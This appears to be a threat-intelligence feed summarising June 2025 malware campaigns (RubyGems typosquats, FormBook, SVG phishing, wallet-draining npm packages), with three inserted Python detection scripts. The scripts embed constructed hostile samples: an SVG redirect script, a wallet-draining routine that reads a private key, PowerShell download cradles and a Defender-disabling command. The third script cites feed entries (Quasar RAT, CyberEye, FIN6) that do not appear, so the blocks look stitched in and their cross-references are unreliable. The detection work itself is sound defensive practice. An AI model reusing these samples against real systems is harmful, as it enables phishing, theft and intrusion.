2025-06-10
RubyGems_Exploit_Telegram_Ban_for_Data_Theft
LOW
+
Intel Source:
Socket
Intel Name:
RubyGems_Exploit_Telegram_Ban_for_Data_Theft
Date of Scan:
2025-06-10
Impact:
LOW
Summary:
Researchers at Socket have identified an ongoing supply chain attack targeting the RubyGems ecosystem, where a threat actor, using Vietnamese-formatted aliases, published malicious gems named fastlane-plugin-telegram-proxy and fastlane-plugin-proxy_teleram around May 24 and May 30, 2025. These gems typosquat legitimate Fastlane plugins and were released shortly after Vietnam's nationwide Telegram ban, exploiting the increased demand for proxy solutions. The malware operates by redirecting Telegram API calls through an attacker-controlled C2 server, silently exfiltrating bot tokens, chat IDs, messages, and files from developers, particularly those using CI/CD pipelines.
Source: https://socket.dev/blog/malicious-ruby-gems-exfiltrate-telegram-tokens-and-messages-following-vietnam-ban
2025-06-09
Threat_Actor_Pivot_to_New_Evasion_Tools
LOW
+
Intel Source:
Esentire
Intel Name:
Threat_Actor_Pivot_to_New_Evasion_Tools
Date of Scan:
2025-06-09
Impact:
LOW
Summary:
Researchers from eSentire have observed threat actors demonstrating significant operational resilience following the recent law-enforcement takedown of a prominent malware-scanning service, AVCheck, during "Operation Endgame". The dismantled platform was a key tool for cybercriminals, allowing them to test malware evasion against security products without the risk of their samples being shared with vendors. eSentire's analysis shows threat actors have quickly migrated to alternative "no distribute" scanning services to continue refining their malicious payloads. This behaviour is part of a systematic process in which actors use crypters to pack malware and then iteratively test it until detection rates are acceptably low, enabling more effective campaigns.
Source: https://www.esentire.com/blog/operation-endgame-disrupts-avcheck-forces-threat-actors-to-seek-alternatives
2025-06-09
BladedFeline_Target_Kurdish_and_Iraqi_Officials
MEDIUM
+
Intel Source:
ESET
Intel Name:
BladedFeline_Target_Kurdish_and_Iraqi_Officials
Date of Scan:
2025-06-09
Impact:
MEDIUM
Summary:
ESET researchers have discovered an Iran-aligned APT group called BladedFeline which is believed to be a subgroup of OilRig APT. The group has been active since at least 2017 and targets high-ranking officials within the Kurdistan Regional Government (KRG), the Government of Iraq (GOI), and a telecom provider in Uzbekistan. This group leverages custom malware such as Shahmaran, Whisper, Slippery Snakelet, the PrimeCache IIS module and reverse tunneling tools like Laret and Pinar. These tools are designed to maintain long-term access to compromised systems, steal sensitive data and execute remote commands. It is believed that the group gains initial access by exploiting internet-facing applications and using stolen email accounts. The group’s primary objective is long-term intelligence gathering to monitor political developments in the region and reduce Western influence.
Source: https://www.welivesecurity.com/en/eset-research/bladedfeline-whispering-dark/
2025-06-09
FormBook_Delivers_through_Malicious_Excel_File
LOW
+
Intel Source:
Fortinet
Intel Name:
FormBook_Delivers_through_Malicious_Excel_File
Date of Scan:
2025-06-09
Impact:
LOW
Summary:
Researchers from FortiGuard have identified an ongoing phishing campaign leveraging the Microsoft Office vulnerability CVE-2017-0199 to install the FormBook information-stealing malware. The campaign targets Windows users who still run outdated Office versions (2007–2016), through emails masquerading as sales orders with malicious Excel attachments. Once the file is opened, the embedded OLE object exploits CVE-2017-0199 to retrieve and execute a remote HTA script via mshta.exe. This script downloads a secondary payload to disk and executes it to ultimately deploy FormBook. The malware is capable of harvesting credentials, keystrokes and clipboard data. The attackers employ anti-debugging techniques and obfuscation to evade detection.
Source: https://www.fortinet.com/blog/threat-research/how-a-malicious-excel-file-cve-2017-0199-delivers-the-formbook-payload
2025-06-09
Operation_DRAGONCLONE
MEDIUM
+
Intel Source:
Seqrite
Intel Name:
Operation_DRAGONCLONE
Date of Scan:
2025-06-09
Impact:
MEDIUM
Summary:
Researchers from Seqrite Labs have uncovered a sophisticated cyberattack targeting China Mobile Tietong Co., Ltd., a subsidiary of China Mobile, that leverages a multi-stage malware delivery chain involving VELETRIX and VShell. The attack began in May 2025 and used a ZIP file posing as internal training material to trick users into opening it. The archive contained legitimate signed binaries alongside a hidden malicious DLL that is loaded through DLL sideloading to deploy VELETRIX. The malware employs several detection-evasion techniques, including sandbox-analysis checks, IP obfuscation and in-memory execution of malicious code. Its primary objective is to load VShell, a post-exploitation framework used to control compromised machines. VShell communicates via standard Windows networking features and is known to be used by Chinese state-sponsored groups such as UNC5174 and Earth Lamia. Researchers also identified connections between this campaign and other known tools such as Cobalt Strike and SuperShell, with command servers based in China, Hong Kong and the US.
Source: https://www.seqrite.com/blog/operation-dragonclone-chinese-telecom-veletrix-vshell-malware/
2025-06-08
PathWiper_Targets_Ukrainian_Critical_Infrastructure
LOW
+
Intel Source:
Cisco Talos
Intel Name:
PathWiper_Targets_Ukrainian_Critical_Infrastructure
Date of Scan:
2025-06-08
Impact:
LOW
Summary:
Researchers from Cisco Talos have discovered a new malware campaign targeting a critical infrastructure organisation in Ukraine that uses a data-wiping malware dubbed PathWiper, distributed through a legitimate endpoint management tool. The attackers executed malicious console commands to run a VBScript, which then delivered and launched PathWiper across multiple systems. Once deployed, the malware enumerates all currently and previously connected storage devices, including network drives, and permanently destroys data by overwriting files and key NTFS structures with random data. PathWiper's tactics closely resemble those of HermeticWiper, a destructive tool previously attributed to Russia's Sandworm group, and researchers attribute this operation to a Russia-aligned state-sponsored threat actor with high confidence.
Source: https://blog.talosintelligence.com/pathwiper-targets-ukraine/
2025-06-08
Hacktivist_Groups_Pivot_to_RaaS
MEDIUM
+
Intel Source:
Rapid7
Intel Name:
Hacktivist_Groups_Pivot_to_RaaS
Date of Scan:
2025-06-08
Impact:
MEDIUM
Summary:
Rapid7 researchers have observed a significant shift among hacktivist groups such as FunkSec, KillSec, and GhostSec, transitioning to financially motivated cybercrime, specifically Ransomware-as-a-Service (RaaS) operations. Initially driven by political or social ideologies and engaging in DDoS and defacement attacks, these groups have increasingly adopted double extortion tactics—data exfiltration and encryption—leveraging RaaS models for profit. FunkSec, emerging in December 2024 and aligning with "Free Palestine," now targets diverse sectors globally using AI-generated FunkLocker ransomware. KillSec, active since 2021 and Russia-aligned, shifted to ransomware in October 2023, offering KillSecurity ransomware for Windows and ESXi. GhostSec, known since 2015 for #OpIsis, partnered with Stormous ransomware in July 2023, launched GhostLocker RaaS in October 2023, and announced a return to hacktivism in May 2024, leaving GhostLocker with Stormous.
Source: https://www.rapid7.com/blog/post/2025/06/03/from-ideology-to-financial-gain-exploring-the-convergence-from-hacktivism-to-cybercrime/
2025-06-08
NS1419_Ransomware_Deploy_via_Fake_Cracking_Tool
MEDIUM
+
Intel Source:
ASEC
Intel Name:
NS1419_Ransomware_Deploy_via_Fake_Cracking_Tool
Date of Scan:
2025-06-08
Impact:
MEDIUM
Summary:
Researchers at ASEC have discovered a new ransomware campaign that disguises the malware as a password-cracking tool to trick users into running it. Built with PyInstaller, the malware masquerades as a brute-force utility aimed at users seeking unauthorised-access tools. On execution it simulates HTTP requests and password attempts while, in the background, it encrypts the user's files with AES-256 in CFB mode. The ransomware skips system-critical directories such as Program Files and Windows, appends the .NS1419 extension to affected files and drops a ransom note demanding $350 in Bitcoin. However, the ransomware neither stores nor transmits the decryption key, so the files cannot be recovered even if the ransom is paid.
Source: https://asec.ahnlab.com/ko/88335/
2025-06-08
Attackers_Use_SVG_Images_to_Steal_Credentials
LOW
+
Intel Source:
Threatdown
Intel Name:
Attackers_Use_SVG_Images_to_Steal_Credentials
Date of Scan:
2025-06-08
Impact:
LOW
Summary:
Threatdown researchers have uncovered a phishing campaign leveraging SVG files embedded with obfuscated JavaScript to steal Microsoft credentials. The attack begins with a spoofed internal email sent to an employee at a logistics company that contains an SVG attachment. These files include obfuscated JavaScript that only runs when the document changes, using a MutationObserver to evade detection. The script decodes a hex-encoded payload and redirects the victim to a phishing site. When the user enters their password, attackers can steal it and potentially access the company’s internal systems, sensitive files or even deploy ransomware.
Source: https://www.threatdown.com/blog/criminals-smuggle-phishing-code-in-svg-images/
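The SVG technique described above works because SVG is XML that may carry <script> elements and on* event handlers, so a mail gateway that treats the attachment as an image never looks at the code. The following is an added example, not Threatdown's tooling: a static triage routine that pulls every script body and event-handler attribute out of an SVG, decodes long hex literals, and flags the file when a decoded string is a URL or the script wires its logic to a MutationObserver. The malicious sample is constructed to mirror the described behaviour (hex-encoded redirect target, MutationObserver trigger) and its URL is a placeholder, not an indicator from the report.

```python
"""Static triage of SVG attachments that carry script.

Added example, not the researchers' code. SAMPLE_MALICIOUS_SVG is constructed:
its script hex-decodes a placeholder phishing URL and fires from a
MutationObserver callback, mirroring the behaviour the entry describes.
"""
from __future__ import annotations

import re
import xml.etree.ElementTree as ET

# A run of at least 24 hex digits (12 bytes) not embedded in a longer hex run.
HEX_BLOB = re.compile(r"(?<![0-9a-fA-F])((?:[0-9a-fA-F]{2}){12,})(?![0-9a-fA-F])")
SUSPICIOUS_APIS = (
    "MutationObserver", "window.location", "document.location", "location.href",
    "location.replace", "eval(", "atob(", "String.fromCharCode", "unescape(",
)


def extract_scripts(svg_text: str) -> list[str]:
    """Return every <script> body and every on* event-handler attribute in the SVG."""
    root = ET.fromstring(svg_text)
    scripts: list[str] = []
    for el in root.iter():
        tag = el.tag.rsplit("}", 1)[-1]          # drop the XML namespace prefix
        if tag == "script" and el.text:
            scripts.append(el.text)
        for attr, value in el.attrib.items():    # onload="...", onclick="..." also execute
            if attr.lower().startswith("on"):
                scripts.append(value)
    return scripts


def decode_hex_blobs(script: str) -> list[str]:
    """Decode long hex literals that turn out to be printable UTF-8 text."""
    decoded: list[str] = []
    for m in HEX_BLOB.finditer(script):
        try:
            text = bytes.fromhex(m.group(1)).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue
        if text.isprintable():
            decoded.append(text)
    return decoded


def analyse_svg(svg_text: str) -> dict:
    """Summarise script content; flag the SVG when it hides a URL or observer-driven code."""
    scripts = extract_scripts(svg_text)
    apis = sorted({api for s in scripts for api in SUSPICIOUS_APIS if api in s})
    decoded = [d for s in scripts for d in decode_hex_blobs(s)]
    urls = [d for d in decoded if re.match(r"https?://", d)]
    malicious = bool(scripts) and (bool(urls) or "MutationObserver" in apis or "eval(" in apis)
    return {
        "script_count": len(scripts),
        "suspicious_apis": apis,
        "decoded_strings": decoded,
        "urls": urls,
        "malicious": malicious,
    }


PHISH_URL = "https://login-portal.example.invalid/?u="   # placeholder, not a real IOC
SAMPLE_MALICIOUS_SVG = """<svg xmlns="http://www.w3.org/2000/svg" width="1" height="1">
  <rect width="1" height="1" fill="#fff"/>
  <script type="text/javascript"><![CDATA[
    var h = "__HEX__";
    function d(s){var o="";for(var i=0;i<s.length;i+=2){o+=String.fromCharCode(parseInt(s.substr(i,2),16));}return o;}
    new MutationObserver(function(){ window.location = d(h) + "user@corp.example"; })
      .observe(document, {childList: true, subtree: true});
  ]]></script>
</svg>""".replace("__HEX__", PHISH_URL.encode().hex())

SAMPLE_BENIGN_SVG = """<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10">
  <circle cx="5" cy="5" r="4" fill="#09f"/>
</svg>"""

if __name__ == "__main__":
    for name, svg in (("malicious", SAMPLE_MALICIOUS_SVG), ("benign", SAMPLE_BENIGN_SVG)):
        print(name, analyse_svg(svg))
```

A gateway policy that strips or quarantines any SVG containing a script element or on* attribute is simpler than this scoring and is the usual mitigation; the decoder is useful for incident response, where the question is which phishing page the victim was sent to.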
2025-06-07
AMOS_Variant_Targets_Spectrum_Users_via_Clickfix
LOW
+
Intel Source:
cloudsek
Intel Name:
AMOS_Variant_Targets_Spectrum_Users_via_Clickfix
Date of Scan:
2025-06-07
Impact:
LOW
Summary:
Researchers at CloudSEK have identified an active campaign by Russian-speaking threat actors distributing a new Atomic macOS Stealer (AMOS) variant, first detailed around June 4, 2025. The operation leverages typo-squatted domains impersonating the U.S. telecom provider Spectrum and employs the Clickfix social engineering method, tricking users into executing malicious code. Attackers deliver operating system-specific payloads: macOS users are served a shell script to harvest system passwords and deploy the AMOS stealer by bypassing native security controls, while Windows users receive PowerShell commands.
Source: https://www.cloudsek.com/blog/amos-variant-distributed-via-clickfix-in-spectrum-themed-dynamic-delivery-campaign-by-russian-speaking-hackers
2025-06-07
Headerless_Malware_Uncovered
LOW
+
Intel Source:
Fortinet
Intel Name:
Headerless_Malware_Uncovered
Date of Scan:
2025-06-07
Impact:
LOW
Summary:
FortiGuard researchers have discovered a Remote Access Trojan (RAT) that infected a Windows system and remained active for several weeks without being detected. The malware runs directly in memory without a valid PE header, which makes it hard for conventional security tools to identify. It is launched through scripts and PowerShell commands and runs inside a dllhost.exe process. It connects to its C2 server over an encrypted connection on port 443 and protects stolen data, such as system information and JPEG screenshots, by encrypting it with a custom XOR scheme. The malware can capture the victim's screen, receive remote commands and manipulate system services, showing it is designed for deep system access and long-term spying.
Source: https://www.fortinet.com/blog/threat-research/deep-dive-into-a-dumped-malware-without-a-pe-header
2025-06-07
ViperSoftX_Variant
LOW
+
Intel Source:
K7 Security Labs
Intel Name:
ViperSoftX_Variant
Date of Scan:
2025-06-07
Impact:
LOW
Summary:
Researchers from K7 Labs have uncovered a ViperSoftX variant targeting Windows systems through cracked software distributed via torrent platforms. The malware is primarily used to deliver information stealers and cryptocurrency hijackers. On execution it uses a hidden PowerShell loader to install and run a second-stage payload disguised as a legitimate DLL. This DLL contains a Lua script engine that runs hidden Lua scripts stored inside an encrypted ZIP file. Its primary objective is to steal personal information and cryptocurrency, notably by watching the clipboard for wallet addresses to hijack.
Source: https://labs.k7computing.com/index.php/in-depth-analysis-of-a-2025-vipersoftx-variant/
2025-06-06
Malware_Disguised_as_AI_Tool_Installers
MEDIUM
+
Intel Source:
Cisco Talos
Intel Name:
Malware_Disguised_as_AI_Tool_Installers
Date of Scan:
2025-06-06
Impact:
MEDIUM
Summary:
Researchers from Cisco Talos have identified a significant trend in which cybercriminals disguise malware as popular AI tools to trick users into downloading it. These fake AI installers are being used to spread three threats: CyberLock ransomware, Lucky_Gh0$t ransomware and a newly discovered destructive malware called Numero. The attackers mainly target individuals and businesses in technology, marketing and B2B sales. To lure victims, they use search engine manipulation and fake messages on platforms such as Telegram and social media. CyberLock encrypts files and demands $50,000 in Monero, falsely claiming the money supports humanitarian causes. Lucky_Gh0$t is a Yashma ransomware variant hidden in a fake ChatGPT installer that is bundled with Microsoft AI tools to look legitimate and avoid detection. Numero is disguised as an AI video-creation tool but renders Windows systems unusable by replacing interface text and buttons with random numbers.
Source: https://blog.talosintelligence.com/fake-ai-tool-installers/
2025-06-06
Malicious_NPM_Crypto_Wallet_Drainers
LOW
+
Intel Source:
Socket
Intel Name:
Malicious_NPM_Crypto_Wallet_Drainers
Date of Scan:
2025-06-06
Impact:
LOW
Summary:
Researchers at Socket have identified four malicious npm packages designed to drain Ethereum and BSC cryptocurrency wallets. These packages, created by an actor named @crypto-exploit (registered with a Russian webmail address) between three to four years ago, collectively amassed over 2,100 downloads. The malware, embedded within packages like pancake_uniswap_validators_utils_snipe and env-process, uses obfuscated JavaScript that relies on environment variables for wallet private keys and then attempts to transfer 80-85% of the victim's wallet balance to a threat actor-controlled address. This known tactic aims for stealth and persistence by leaving some funds for gas fees.
Source: https://socket.dev/blog/malicious-npm-packages-target-bsc-and-ethereum
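Both this entry and the RubyGems entry above (fastlane-plugin-telegram-proxy and fastlane-plugin-proxy_teleram) describe packages whose malice is visible statically: a name that shadows a legitimate plugin, a Telegram Bot API base URL pointed at a third-party host, a signing key read from environment variables and a fixed fraction of the balance sent to a hard-coded address. The following is an added example, not Socket's tooling: a triage routine that scores a package name against an allowlist with difflib and runs a handful of source-pattern rules. KNOWN_GOOD is an assumed allowlist, and the gem and npm sources are constructed stand-ins that reproduce the described behaviours, not the published packages.

```python
"""Static triage of a suspect package: typosquat distance plus source-pattern rules.

Added example, not Socket's code. KNOWN_GOOD is an assumed allowlist; the three
source samples are constructed stand-ins, not the published packages.
"""
from __future__ import annotations

import difflib
import re

KNOWN_GOOD = {"fastlane-plugin-telegram", "fastlane-plugin-versioning", "web3", "ethers"}

SOURCE_RULES = {
    # Bot API URL whose host is not Telegram's: every call, token included, goes to that host.
    "telegram_api_host_override": re.compile(
        r"['\"]https?://(?!api\.telegram\.org)[\w.-]+(?::\d+)?/bot", re.I),
    # Signing key pulled from CI/CD or developer environment variables (JS or Ruby style).
    "private_key_from_env": re.compile(
        r"process\.env\.\w*(?:PRIVATE_KEY|MNEMONIC|SECRET)\w*"
        r"|ENV\[['\"]\w*(?:PRIVATE_KEY|MNEMONIC)\w*['\"]\]"),
    # Destination baked into the package rather than supplied by the caller.
    "hardcoded_eth_address": re.compile(r"\b0x[0-9a-fA-F]{40}\b"),
    # Sends a fixed fraction of the balance (e.g. 0.85 or 85/100), leaving the rest for gas.
    "balance_skim_fraction": re.compile(
        r"bal\w*\s*\*\s*(?:0?\.\d+|\d{1,2}n?\s*/\s*100n?)"
        r"|\.mul\(\s*\d{1,2}\s*\)\s*\.div\(\s*100\s*\)", re.I),
}


def normalise(name: str) -> str:
    """Registries treat '-' and '_' loosely; compare names in one canonical form."""
    return name.lower().replace("_", "-")


def typosquat_candidates(name: str, known=KNOWN_GOOD, threshold: float = 0.85) -> list[tuple[str, float]]:
    """Known-good names this package name closely resembles, best match first."""
    n = normalise(name)
    if n in {normalise(k) for k in known}:
        return []                                   # exact match: it is the real package
    hits = []
    for k in known:
        ratio = difflib.SequenceMatcher(None, n, normalise(k)).ratio()
        if ratio >= threshold:
            hits.append((k, round(ratio, 3)))
    return sorted(hits, key=lambda h: -h[1])


def scan_source(source: str) -> list[str]:
    """Names of the source rules that match, sorted for stable output."""
    return sorted(rule for rule, rx in SOURCE_RULES.items() if rx.search(source))


def triage_package(name: str, source: str) -> dict:
    squat = typosquat_candidates(name)
    rules = scan_source(source)
    return {"name": name, "lookalike_of": squat, "rules": rules,
            "suspicious": bool(rules) or bool(squat)}


SAMPLE_GEM_SOURCE = '''module Fastlane
  module Helper
    class TelegramProxyHelper
      BASE = "https://tg-proxy.example.invalid/bot"
      def self.send_message(token, chat_id, text)
        uri = URI("#{BASE}#{token}/sendMessage")
        Net::HTTP.post_form(uri, "chat_id" => chat_id, "text" => text)
      end
    end
  end
end
'''  # constructed: mirrors the described redirect of Bot API calls to a third-party host

SAMPLE_NPM_SOURCE = '''const Web3 = require("web3");
const w3 = new Web3(process.env.RPC_URL || "https://bsc-dataseed.example.invalid");
const acct = w3.eth.accounts.privateKeyToAccount(process.env.PRIVATE_KEY);
const SINK = "0x000000000000000000000000000000000000dEaD";
async function validate() {
  const balance = BigInt(await w3.eth.getBalance(acct.address));
  const amount = balance * 85n / 100n;   // keep ~15% so gas still clears
  await w3.eth.sendTransaction({ from: acct.address, to: SINK, value: amount.toString() });
}
'''  # constructed: SINK is the well-known burn address, not a threat-actor wallet

SAMPLE_BENIGN_SOURCE = '''const url = "https://api.telegram.org/bot" + process.env.API_TOKEN + "/getMe";
fetch(url).then(r => r.json()).then(console.log);
'''

if __name__ == "__main__":
    print(triage_package("fastlane-plugin-proxy_teleram", SAMPLE_GEM_SOURCE))
    print(triage_package("pancake_uniswap_validators_utils_snipe", SAMPLE_NPM_SOURCE))
    print(triage_package("fastlane-plugin-telegram", SAMPLE_BENIGN_SOURCE))
```

The name check only helps when the allowlist contains the package the attacker is imitating, which is why the wallet-drainer names, which imitate nothing, are caught by the source rules alone; in a CI pipeline the same rules are cheap enough to run over every dependency's unpacked tarball before install scripts execute.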
2025-06-06
Fake_Zoom_Client_Delivers_RAT
LOW
+
Intel Source:
ISC.SANS
Intel Name:
Fake_Zoom_Client_Delivers_RAT
Date of Scan:
2025-06-06
Impact:
LOW
Summary:
Researchers at ISC.SANS have found a campaign distributing malware through fake Zoom client updates, observed around June 4, 2025. Attackers lure victims with phishing emails containing fake Zoom meeting invitations. Clicking the embedded link directs users to a webpage prompting a Zoom client update, which, if downloaded, delivers an executable ("Session.ClientSetup.exe"). This initial payload acts as a downloader, deploying an MSI package that installs ScreenConnect, a legitimate remote access tool, configured for malicious control by the attackers and establishing persistence as a service. The primary objective appears to be gaining unauthorized remote access to victim systems. This tactic leverages the widespread reliance on collaborative tools, particularly since the shift to remote work, posing a significant risk of unauthorized access and potential follow-on attacks.
Source: https://isc.sans.edu/diary/rss/32014
2025-06-06
DuplexSpy_RAT_Target_Window_Users
LOW
+
Intel Source:
Cyfirma
Intel Name:
DuplexSpy_RAT_Target_Window_Users
Date of Scan:
2025-06-06
Impact:
LOW
Summary:
CYFIRMA researchers have identified a new malware called DuplexSpy RAT that targets Windows systems. It was originally published on GitHub by a user named ISSAC/iss4cfOng for educational purposes, but cybercriminals have now started using it. DuplexSpy gives attackers full control of infected machines, including logging keystrokes, recording the screen, turning on webcams and microphones, running remote commands and even moving the mouse. It hides itself by copying files to startup folders, modifying registry settings, injecting code into other processes and using encryption to avoid detection. It can also disguise itself as a legitimate Windows update and shuts down security software to stay hidden.
Source: https://www.cyfirma.com/research/duplexspy-rat-stealthy-windows-malware-enabling-full-remote-control-and-surveillance/
2025-06-05
AI_Tool_Misconfig_Exploited_for_Malicious_Payload
MEDIUM
+
Intel Source:
Sysdig
Intel Name:
AI_Tool_Misconfig_Exploited_for_Malicious_Payload
Date of Scan:
2025-06-05
Impact:
MEDIUM
Summary:
The Sysdig Threat Research Team have reported an incident where a threat actor exploited a misconfigured, internet-exposed Open WebUI instance to deploy an AI-generated Python payload. This payload targeted both Linux and Windows systems, downloading T-Rex and XMRig cryptominers for Monero and Kawpow, establishing persistence via systemd services, and using a Discord webhook for C2. The financially motivated attack leveraged uncommon defense evasion tools like processhider and argvhider (an LD_PRELOAD technique to hide process arguments) on Linux. The Windows variant was more sophisticated, deploying a Java-based loader (application-ref.jar) which in turn executed secondary malicious JARs containing infostealers targeting Chrome extensions and Discord tokens, and employed multiple DLLs for XOR decoding and sandbox evasion.
Source: https://sysdig.com/blog/attacker-exploits-misconfigured-ai-tool-to-run-ai-generated-payload/
2025-06-05
Lazarus_Stealer_Targets_Professionals
LOW
+
Intel Source:
Any.Run
Intel Name:
Lazarus_Stealer_Targets_Professionals
Date of Scan:
2025-06-05
Impact:
LOW
Summary:
Researchers at ANY.RUN have found OtterCookie, a new JavaScript-based stealer malware attributed to the North Korean Lazarus Group, targeting finance and technology professionals. First observed in a campaign around June 2025, attackers employ social engineering, often through fake job offers or freelance bug fix tasks on platforms like LinkedIn, to deliver what appears to be legitimate Node.js code hosted in a Bitbucket repository. The malware's novelty lies in its execution method: an intentionally flawed piece of code triggers an error handler that fetches and executes a heavily obfuscated JavaScript payload from an external API, reportedly hosted in Finland.
Source: https://any.run/cybersecurity-blog/ottercookie-malware-analysis/
2025-06-04
HuluCaptcha_CAPTCHA_Deploys_Malware
LOW
+
Intel Source:
Gi7w0rm (Medium)
Intel Name:
HuluCaptcha_CAPTCHA_Deploys_Malware
Date of Scan:
2025-06-04
Impact:
LOW
Summary:
Researcher Gi7w0rm has uncovered a new malicious campaign called HuluCaptcha, which uses fake CAPTCHA pages to distribute malware such as Lumma Stealer, Aurotun Stealer and Donut Injector. The attackers compromise legitimate websites, including those of the German Association for International Law and the Los Angeles Caregiver Resource Center, by injecting malicious JavaScript that redirects users to fake CAPTCHA screens designed to resemble Cloudflare's. These pages trick users into pasting and executing malicious commands via the Windows Run dialog, which installs the malware. The campaign also includes tools for victim tracking and customised PowerShell payload generation, and shows indications of an affiliate tracking system aimed at scaling the operation.
Source: https://gi7w0rm.medium.com/hulucaptcha-an-example-of-a-fakecaptcha-framework-9f50eeeb2e6d
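Several entries above share one detection surface: the Quasar RAT chain (a batch file spawning PowerShell to download the next stage), CyberEye (Defender switched off with PowerShell), the FIN6 More_Eggs chain (an .LNK running JavaScript through wscript.exe), the FormBook campaign (Excel spawning mshta.exe for a remote HTA) and HuluCaptcha (a command pasted into the Run dialog, so the parent is explorer.exe). Each is a parent/child process pair plus a command line, which is exactly what process-creation telemetry records. The following is an added example, not code from any of the cited reports: five triage rules over Sysmon Event ID 1-style events, with constructed sample events that are illustrations, not indicators from the reports.

```python
"""Process-creation triage for the living-off-the-land chains in the entries above.

Added example, not code from any of the cited reports. Field names follow the
Sysmon Event ID 1 convention (ParentImage, Image, CommandLine); SAMPLE_EVENTS
are constructed for illustration and are not indicators from the reports.
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


# Download cradles commonly seen in first-stage batch/PowerShell loaders.
DOWNLOAD_CRADLE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|invoke-restmethod|"
    r"\birm\b|\bcurl\b|net\.webclient|start-bitstransfer",
    re.I,
)
# Set-MpPreference -Disable<Feature> $true  /  Add-MpPreference -ExclusionPath ...
DEFENDER_TAMPER = re.compile(
    r"set-mppreference\s+.*-disable\w*\s+\$?true|add-mppreference\s+.*-exclusion", re.I
)
# Flags that hide the window or carry an encoded command.
HIDDEN_OR_ENCODED = re.compile(
    r"(^|\s)-(e|ec|enc|encodedcommand|w\s+hidden|nop|noprofile)\b", re.I
)
OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}
SCRIPT_EXT = re.compile(r"\.(js|jse|vbs|vbe|wsf)\b", re.I)
USER_WRITABLE = re.compile(r"\\(users\\[^\\]+\\(downloads|appdata)|temp|programdata)\\", re.I)


def _base(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage(ev: ProcEvent) -> list[str]:
    """Return the names of every rule that fires for one process-creation event."""
    parent, image, cl = _base(ev.parent_image), _base(ev.image), ev.command_line
    hits: list[str] = []
    # Quasar RAT chain: batch file launches PowerShell to fetch the next stage.
    if parent == "cmd.exe" and image == "powershell.exe" and DOWNLOAD_CRADLE.search(cl):
        hits.append("batch_spawns_powershell_download_cradle")
    # CyberEye: Defender switched off through Set-MpPreference.
    if image == "powershell.exe" and DEFENDER_TAMPER.search(cl):
        hits.append("defender_tampering_via_mppreference")
    # FormBook: Office document pulls a remote HTA via mshta.exe (CVE-2017-0199 pattern).
    if parent in OFFICE_APPS and image == "mshta.exe":
        hits.append("office_spawns_mshta")
    # FIN6 More_Eggs: LNK runs JavaScript from a user-writable path through wscript.exe.
    if image == "wscript.exe" and SCRIPT_EXT.search(cl) and USER_WRITABLE.search(cl):
        hits.append("wscript_runs_script_from_user_path")
    # HuluCaptcha/ClickFix: command pasted into the Run dialog (parent explorer.exe).
    if (parent == "explorer.exe" and image in {"powershell.exe", "cmd.exe", "mshta.exe"}
            and (HIDDEN_OR_ENCODED.search(cl) or DOWNLOAD_CRADLE.search(cl))):
        hits.append("run_dialog_launch_with_evasion_flags")
    return hits


def scan(events: list[ProcEvent]) -> list[tuple[ProcEvent, list[str]]]:
    """Every event that matched at least one rule, paired with its rule names."""
    out = []
    for ev in events:
        hits = triage(ev)
        if hits:
            out.append((ev, hits))
    return out


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed, not from the reports
    ProcEvent(r"C:\Windows\System32\cmd.exe", PS,
              "powershell -w hidden -c \"(New-Object Net.WebClient).DownloadString('http://example.invalid/s2.bat') | iex\""),
    ProcEvent(r"C:\Windows\explorer.exe", PS,
              "powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true"),
    ProcEvent(r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
              r"C:\Windows\System32\mshta.exe", "mshta.exe http://example.invalid/order.hta"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\wscript.exe",
              r"wscript.exe C:\Users\jdoe\Downloads\Resume\resume.js"),
    ProcEvent(r"C:\Windows\explorer.exe", PS, "powershell -w hidden -enc SQBFAFgAIAAoAC4ALgAuACkA"),
    ProcEvent(r"C:\Windows\System32\services.exe", r"C:\Windows\System32\svchost.exe",
              "svchost.exe -k netsvcs"),
]

if __name__ == "__main__":
    for ev, hits in scan(SAMPLE_EVENTS):
        print(f"{_base(ev.parent_image)} -> {_base(ev.image)}: {', '.join(hits)}")
```

Each rule keys on the relationship between parent, child and command line rather than on a hash, which is what keeps it useful across the crypter iterations described in the eSentire entry; the Run dialog rule in particular is worth pairing with the RunMRU registry value, where the pasted command is persisted even when the process event is missed.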
2025-06-03
ViperSoftX_Targeting_Cryptocurrency_Users
LOW
+
Intel Source:
ASEC
Intel Name:
ViperSoftX_Targeting_Cryptocurrency_Users
Date of Scan:
2025-06-03
Impact:
LOW
Summary:
ASEC researchers have observed the ViperSoftX threat actor targeting cryptocurrency users across the globe, with recent attacks in Korea. This multi-stage malware campaign has been active for several years and aims for financial gain by stealing cryptocurrency-related information and hijacking transactions. ViperSoftX gains initial access through pirated software or malicious torrent files. Once on a system, it establishes persistence via scheduled tasks and obfuscated PowerShell scripts. The malware then deploys further tools, including downloaders, information stealers such as TesseractStealer, clipboard manipulators (ClipBanker) that swap wallet addresses, and RATs such as Quasar RAT and PureHVNC, communicating with C2 servers over HTTP and DNS. It also monitors clipboard activity for cryptocurrency wallet addresses and BIP39 recovery phrases, exfiltrates browser data and system information, and executes arbitrary commands from the attacker.
Source: https://asec.ahnlab.com/ko/88265/
2025-06-03
JINX_0132_DevOps_Cryptojacking_Campaign
LOW
+
Intel Source:
Wiz.io
Intel Name:
JINX_0132_DevOps_Cryptojacking_Campaign
Date of Scan:
2025-06-03
Impact:
LOW
Summary:
Researchers at Wiz have identified a widespread cryptojacking campaign, attributed to the threat actor JINX-0132, targeting publicly accessible and misconfigured DevOps tools such as HashiCorp Nomad, Consul, Docker API, and Gitea, including instances in major cloud environments. Active as of June 2025, JINX-0132 exploits known vulnerabilities and insecure default settings—like Nomad's job creation or Consul's health checks—to achieve remote code execution and deploy the XMRig Monero miner for financial gain.
Source: https://www.wiz.io/blog/jinx-0132-cryptojacking-campaign
